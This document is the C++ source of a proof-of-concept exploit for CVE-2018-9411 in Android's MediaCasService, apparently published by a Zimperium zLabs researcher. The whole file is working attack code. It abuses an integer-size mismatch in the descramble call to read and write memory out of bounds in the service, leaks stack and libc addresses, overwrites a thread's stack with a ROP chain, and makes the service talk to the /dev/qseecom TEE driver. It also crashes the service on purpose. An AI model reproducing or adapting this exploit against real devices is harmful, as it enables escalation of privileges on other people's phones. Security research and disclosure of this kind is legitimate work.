README.md
Rendering markdown...
//
// CVE-2018-9411 exploit for MediaCasService
// Author: Tamir Zahavi-Brunner (@tamir_zb) of Zimperium zLabs Team
//
#include <utils/StrongPointer.h>
#include <binder/MemoryHeapBase.h>
#include <android/hardware/cas/1.0/IMediaCasService.h>
#include <android/hardware/cas/1.0/ICas.h>
#include <android/hardware/cas/1.0/ICasListener.h>
#include <android/hardware/cas/native/1.0/IDescrambler.h>
#include <stdio.h>
#include <unistd.h>
#include <pthread.h>
#include "qseecom.h"
#include "offsets.h"
#include "defs.h"
using ::android::sp;
using ::android::MemoryHeapBase;
using ::android::hardware::hidl_vec;
using ::android::hardware::hidl_memory;
using ::android::hardware::hidl_handle;
using ::android::hardware::hidl_string;
using ::android::hardware::Return;
using ::android::hardware::Void;
using namespace android::hardware::cas::V1_0;
using namespace android::hardware::cas::native::V1_0;
// Global variables relevant for most of the exploit.
static sp<ICas> cas;
static sp<IDescrambler> descrambler;
static pthread_barrier_t barrier;
// A listener that upon receiving an event, waits on the pthread barrier before
// returning. This causes a remote HwBinder thread to be blocked in a known
// state (waiting for the onEvent response) until the wait for the barrier is
// over.
class CasListener : public ICasListener {
virtual Return<void> onEvent(int32_t, int32_t, const hidl_vec<uint8_t>&) {
pthread_barrier_wait(&barrier);
return Void();
}
};
// Prepare a valid descrambler object to be used in the exploit.
// Based on AOSP's MediaCasTest.java
static bool prepare_descrambler() {
sp<IMediaCasService> service = IMediaCasService::getService();
if (service == NULL) {
return false;
}
static sp<ICasListener> listener = new CasListener();
cas = service->createPlugin(CLEARKEY_SYSTEMID, listener);
descrambler = IDescrambler::castFrom(
service->createDescrambler(CLEARKEY_SYSTEMID));
if (cas->provision(provision_str) != Status::OK) {
return false;
}
Status opensession_status;
hidl_vec<uint8_t> descrambler_session;
cas->openSession([&](Status status, const hidl_vec<uint8_t>& session_id) {
opensession_status = status;
descrambler_session = session_id;
});
if (opensession_status != Status::OK) {
return false;
}
if (descrambler->setMediaCasSession(descrambler_session) != Status::OK) {
return false;
}
return true;
}
// Simply send an event in order to recieve it in CasListener.
static void *event_thread(void *) {
hidl_vec<uint8_t> vec;
cas->sendEvent(0, 0, vec);
return NULL;
}
// Prepare remote threads, all blocked in the same known state (waiting for the
// onEvent response).
static bool prepare_threads() {
if (pthread_barrier_init(&barrier, NULL, THREADS_NUM + 1) != 0) {
return false;
}
static pthread_t threads[THREADS_NUM];
for (size_t i = 0; i < THREADS_NUM; i++) {
if (pthread_create(threads + i, NULL, event_thread, NULL) != 0) {
return false;
}
}
// Wait for all the remote threads to reach the blocked state.
usleep(500000);
return true;
}
// Let all the remote blocked threads run.
static void unblock_threads() {
pthread_barrier_wait(&barrier);
pthread_barrier_destroy(&barrier);
}
// Run the descramble vulnerability in order to perform out of bounds copy.
static bool run_descramble_vuln(sp<MemoryHeapBase>& heap,
uint32_t src_offset, uint32_t dst_offset, uint32_t copy_size) {
native_handle_t* handle = native_handle_create(1, 0);
handle->data[0] = heap->getHeapID();
SharedBuffer src;
src.offset = 0;
// 0x100000000 would allow access to the entire 32 bit address range.
src.size = 0x100000000;
// 0x100000000 + heap size will be treated as the size of the shared memory
// when performing checks, but when running mmap the number would be
// treated as 32 bit and not 64, so the actual size will be just the heap
// size.
src.heapBase = hidl_memory("ashmem", hidl_handle(handle),
0x100000000 + heap->getSize());
DestinationBuffer dst;
dst.type = BufferType::SHARED_MEMORY;
dst.nonsecureMemory = src;
hidl_vec<SubSample> subsamples;
SubSample subsample_arr[] = {{ .numBytesOfClearData = copy_size,
.numBytesOfEncryptedData = 0 }};
subsamples.setToExternal(subsample_arr, 1);
Status descramble_status;
Return<void> descramble_result = descrambler->descramble(
ScramblingControl::UNSCRAMBLED, subsamples, src, src_offset, dst,
dst_offset,
[&] (Status status, uint32_t, const hidl_string&) {
descramble_status = status;
});
native_handle_delete(handle);
return (descramble_result.isOk() && descramble_status == Status::OK);
}
// Crash the service, which will cause it to restart. The crash is by writing
// to a known unmapped address, in order to differentiate this planned crash
// from possible other unplanned crashes.
static void crash_service(sp<MemoryHeapBase>& small_heap,
uint32_t small_heap_addr) {
run_descramble_vuln(small_heap, 0, CRASH_ADDR - small_heap_addr, 1);
}
// We utilize the fact that the linker leaves data indicating its address in
// order to determine the address that the small heap is mapped at.
static bool find_small_heap_addr(sp<MemoryHeapBase>& small_heap,
uint32_t *addr) {
if (!run_descramble_vuln(small_heap, PAGE_SIZE + LINKER_ADDR_OFFSET, 0,
sizeof(*addr))) {
return false;
}
*addr = *(uint32_t *)small_heap->getBase() -
LINKER_ADDR_SMALL_HEAP_ADDR_OFFSET;
return true;
}
// Try to have our shared memory mapped directly above threads stacks, then
// read data from a stack of a thread blocked on an onEvent call, which will be
// our target thread.
static bool find_target_thread(sp<MemoryHeapBase>& large_heap,
uint32_t *stack_addr, uint32_t *libc_addr) {
// 4 = our own shared memory + 3 stacks in order to find a stack of a
// thread which is in the (blocked) state we want it to be. Top stacks
// would most likely be the threads currently parsing our request.
uint32_t read_offset = STACK_SIZE * 4;
read_offset += START_THREAD_OFFSET;
uint32_t copy_size = STACK_BASE_OFFSET - START_THREAD_OFFSET +
sizeof(*stack_addr);
if (!run_descramble_vuln(large_heap, read_offset, 0, copy_size)) {
return false;
}
uint8_t *large_heap_data = (uint8_t *)large_heap->getBase();
// In order to find the address the stack is mapped in we find pthread's
// pthread_internal_t struct in the bottom and read its "attr.stack_base".
uint32_t stack_map = *(uint32_t *)(large_heap_data + STACK_BASE_OFFSET -
START_THREAD_OFFSET);
// In order to find libc, we use an address on the stack which is to a
// location inside libc's __start_thread.
uint32_t start_thread = *(uint32_t *)(large_heap_data);
// If our shared memory wasn't mapped directly over the threads stacks then
// at least one of these would most likely be 0.
if (start_thread == 0 || stack_map == 0) {
return false;
}
// Skip the guard page at the beginning of the stack.
*stack_addr = stack_map + PAGE_SIZE;
*libc_addr = start_thread - START_THREAD_LIBC_OFFSET;
return true;
}
// Overwrite the target thread's stack with our ROP stack.
static bool write_rop(sp<MemoryHeapBase>& small_heap, uint32_t stack_addr,
uint32_t libc_addr, uint32_t small_heap_addr) {
// This ROP chain performs the following code:
//
// int fd = open("/dev/qseecom", 0);
// ioctl(fd, QSEECOM_IOCTL_GET_QSEOS_VERSION_REQ, stack_addr);
// sleep(0xffffffff);
//
// This ROP chain demonstrates how the exploit performs communication with
// the TEE device driver by getting the QSEOS version. The sleep at the end
// allows us to read the result (otherwise the target thread would crash
// immediately after running the ROP chain).
uint32_t *rop = (uint32_t *)small_heap->getBase();
size_t i = 0;
rop[i++] = libc_addr + POP_R0_R1_PC; // pc = pop {r0, r1, pc}
rop[i++] = UNUSED_REGISTER; // r0
rop[i++] = libc_addr + POP_R0_R1_PC; // r1 = pop {r0, r1, pc}
rop[i++] = libc_addr + BLX_R1_POP_R7_PC; // pc = blx r1; pop {r7, pc}
rop[i++] = stack_addr; // r0 = "/dev/qseecom"
rop[i++] = 0; // r1 = 0
rop[i++] = libc_addr + OPEN_2_OFFSET; // pc = __open_2
rop[i++] = UNUSED_REGISTER; // r7
rop[i++] = libc_addr + POP_R1_R2_PC; // pc = pop {r1, r2, pc}
rop[i++] = libc_addr + POP_R1_R2_PC; // r1 = pop {r1, r2, pc}
rop[i++] = UNUSED_REGISTER; // r2
rop[i++] = libc_addr + BLX_R1_POP_R7_PC; // pc = blx r1; pop {r7, pc}
rop[i++] = QSEECOM_IOCTL_GET_QSEOS_VERSION_REQ; // r1
rop[i++] = stack_addr; // r2 = stack_addr
rop[i++] = libc_addr + IOCTL_OFFSET; // pc = ioctl
rop[i++] = UNUSED_REGISTER; // r7
rop[i++] = libc_addr + POP_R0_PC; // pc = pop {r0, pc}
rop[i++] = 0xffffffff; // r0 = 0xffffffff
rop[i++] = libc_addr + SLEEP_OFFSET; // pc = sleep
// The ROP stack begins by overwriting a return address in the blocked
// thread.
return run_descramble_vuln(small_heap, 0,
stack_addr + WAIT_FOR_RESPONSE_RA_OFFSET - small_heap_addr,
sizeof(*rop) * i);
}
int main(int, char **argv) {
// We use a small gap that the linker leaves in order to have a
// deterministic location for the shared memory to be mapped at. The gap is
// so small that usually nothing else gets mapped there. The small heap is
// a single page in order to always be mapped in that gap.
sp<MemoryHeapBase> small_heap = new MemoryHeapBase(PAGE_SIZE);
// Use a relatively large shared memory (stack size is large enough) in
// order to try and be mapped directly above threads stacks.
sp<MemoryHeapBase> large_heap = new MemoryHeapBase(STACK_SIZE);
uint32_t small_heap_addr, stack_addr, libc_addr;
if (!prepare_descrambler()) {
fprintf(stderr, "[-] Failed to prepare the descrambler object\n");
return -1;
}
printf("[+] Prepared descrambler object\n");
if (!find_small_heap_addr(small_heap, &small_heap_addr)) {
fprintf(stderr, "[-] Failed to find small heap address\n");
return -1;
}
printf("[+] Determined small heap address (address = 0x%08x)\n",
small_heap_addr);
if (!prepare_threads()) {
fprintf(stderr, "[-] Failed to prepare the remote threads\n");
return -1;
}
printf("[+] Prepared remote threads\n");
if (!find_target_thread(large_heap, &stack_addr, &libc_addr)) {
// This is the most unreliable part of the exploit. Other things
// (like the jemalloc heap) could easily get mapped between us and
// the threads stacks. So in case something like that happens we
// crash the service in order for it to restart and then try again.
fprintf(stderr, "[-] Failed to find target thread, crashing service "
"and retrying...\n\n");
crash_service(small_heap, small_heap_addr);
// Dirty restart, better code would reset the resources and try again.
execv(argv[0], argv);
}
printf("[+] Found target thread (stack address = 0x%08x, libc address = "
"0x%08x)\n", stack_addr, libc_addr);
// The offset to the target thread stack from the small heap.
uint32_t stack_addr_offset = stack_addr - small_heap_addr;
// Copy data for the ROP chain to the top of the stack (writable location
// that won't get overwritten).
char dev_qseecom[] = "/dev/qseecom";
strcpy((char *)small_heap->getBase(), dev_qseecom);
if (!run_descramble_vuln(small_heap, 0, stack_addr_offset,
sizeof(dev_qseecom))) {
fprintf(stderr, "[-] Failed to copy data for the ROP chain\n");
return -1;
}
printf("[+] Copied data for ROP chain\n");
if (!write_rop(small_heap, stack_addr, libc_addr, small_heap_addr)) {
fprintf(stderr, "[-] Failed to write ROP stack\n");
return -1;
}
printf("[+] ROP stack written\n");
printf("[+] Running ROP chain...\n");
unblock_threads();
// Wait for the target thread to run the ROP chain.
usleep(500000);
// Copy back the result - QSEOS version.
if (!run_descramble_vuln(small_heap, stack_addr_offset, 0,
sizeof(uint32_t))) {
fprintf(stderr, "[-] Failed to copy QSEOS version\n");
return -1;
}
uint32_t qseos_version = *(uint32_t *)small_heap->getBase();
printf("[+] QSEOS version = 0x%x\n", qseos_version);
// Clear everything by crashing the service and letting it restart.
crash_service(small_heap, small_heap_addr);
return 0;
}